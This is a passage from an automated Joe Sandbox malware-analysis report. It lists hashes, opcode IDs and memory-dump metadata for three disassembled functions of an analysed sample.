                                                                                                                                                              • Opcode Fuzzy Hash: 87a7dbeee7adf1ddb3ebcf8eaa91aee636632f364ad275da5c14b17c3cd525cb
                                                                                                                                                              • Instruction Fuzzy Hash: 0251B634A19A5C8FDB95DB68D864AA8B7B1FF59300F5101E9D00DE7262DB31AE81CF01
                                                                                                                                                              Function 00007FFD9B733FBF Relevance: .1, Instructions: 88COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 216b0b79d5dfe0e7ac5af6c33cdd6a262f2c8c6cc542273b7cb527c9122201dc
                                                                                                                                                              • Instruction ID: b079160c810b5e3a899161421a5922a24288b8817a85431039cb5712aaa2f1f6
                                                                                                                                                              • Opcode Fuzzy Hash: 216b0b79d5dfe0e7ac5af6c33cdd6a262f2c8c6cc542273b7cb527c9122201dc
                                                                                                                                                              • Instruction Fuzzy Hash: 1C313A31E0422D8AEB68DE14E8A0BF9B3B1EB55304F8081ADD04EA7185DE356A86DF50
                                                                                                                                                              Function 00007FFD9B7246D4 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 8034ef602f3639900f0d90c2f20e005c92448bfaafa4d55c8f024588cc476a81
                                                                                                                                                              • Instruction ID: f4c7dcc25bfeb87576ddf2c109e7e55c7fed1c7858425fe6cc01d309e6c9b80b
                                                                                                                                                              • Opcode Fuzzy Hash: 8034ef602f3639900f0d90c2f20e005c92448bfaafa4d55c8f024588cc476a81
                                                                                                                                                              • Instruction Fuzzy Hash: 2A01A720F0E54D4AEB649F64D860BBCB3B1EF57304F4196FAD01EE31AACD356A858B05